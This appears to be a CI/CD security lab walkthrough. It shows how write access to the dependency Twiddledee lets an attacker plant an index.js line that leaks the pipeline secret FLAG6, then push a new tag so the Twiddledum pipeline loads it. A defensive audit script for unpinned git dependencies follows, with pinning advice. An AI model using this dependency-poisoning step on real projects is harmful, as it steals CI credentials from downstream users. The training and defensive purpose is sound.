The Wonderland/Twiddledum repository is a JS app that uses Wonderland/Twiddledee as a dependency (view its package.json file).
You have write access to the Wonderland/Twiddledee repository. Use your access to modify it in order to exfiltrate pipeline credentials of projects using it.
Trying to add pre or post-install scripts with malicious code should fail, as the Twiddledum pipeline runs with the --ignore-scripts param.
- Clone the Wonderland/twiddledee repository.
- Add the following line to index.js to print the secret to the job’s console output (or send it to a remote server you control):
    console.log(Buffer.from(process.env.FLAG6).toString("base64"))
- Commit the changes to the main branch.
- Create a new tag 1.2.0 for the last commit and push it:
    git tag 1.2.0 HEAD
    git push origin 1.2.0
- Manually trigger the twiddledum pipeline.
- Access the console output of the executed job to get the encoded secret.
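
From the defender's side, the steps above succeed because --ignore-scripts only blocks install hooks, not code that runs when the module is loaded, and because the consuming project picks up whatever the newest matching tag points to. The following added example (not part of the original write-up or the Wonderland repositories) audits a parsed package.json for git-hosted dependencies that are not pinned to a full commit SHA; the manifest contents, host name and version range are constructed assumptions, since the page does not show Twiddledum's package.json.

```javascript
// Added example: flag git-hosted dependencies that can change without a
// reviewed commit in the consuming repository.
// Covers URL-style and host-prefixed git specs; bare "user/repo" shorthand is not handled.
const GIT_SPEC = /^(git\+|git:|github:|gitlab:|bitbucket:)|\.git(#|$)/i;
const FULL_SHA = /^[0-9a-f]{40}$/i;

// Returns null for non-git specs, otherwise how the spec gets resolved.
function classifyGitSpec(spec) {
  if (!GIT_SPEC.test(spec)) return null;               // registry dependency, out of scope
  const hash = spec.indexOf('#');
  const committish = hash === -1 ? '' : spec.slice(hash + 1);
  if (FULL_SHA.test(committish)) return 'pinned';      // immutable reference
  if (committish.startsWith('semver:')) return 'semver-range'; // resolved against repo tags
  if (committish === '') return 'default-branch';      // whatever the branch head is
  return 'mutable-ref';                                // tag or branch name, can be moved
}

// Walks every dependency section and returns the unpinned git dependencies.
function auditGitDependencies(pkg) {
  const findings = [];
  for (const section of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const [name, spec] of Object.entries(pkg[section] || {})) {
      const kind = classifyGitSpec(String(spec));
      if (kind && kind !== 'pinned') findings.push({ section, name, spec, kind });
    }
  }
  return findings;
}

// Constructed sample manifest (hypothetical host, range and SHA).
const samplePkg = {
  name: 'twiddledum',
  dependencies: {
    twiddledee: 'git+http://git.example.test/Wonderland/twiddledee.git#semver:^1.1.0',
    pinnedlib: 'git+https://git.example.test/acme/pinnedlib.git#0123456789abcdef0123456789abcdef01234567',
    lodash: '^4.17.21',
  },
};

for (const f of auditGitDependencies(samplePkg)) {
  console.log(`${f.section}.${f.name}: ${f.kind} (${f.spec})`);
}
```

Pinning the dependency to a commit SHA and installing from a committed lockfile with npm ci keeps a newly pushed tag from reaching the pipeline without a reviewed change in the consuming repository.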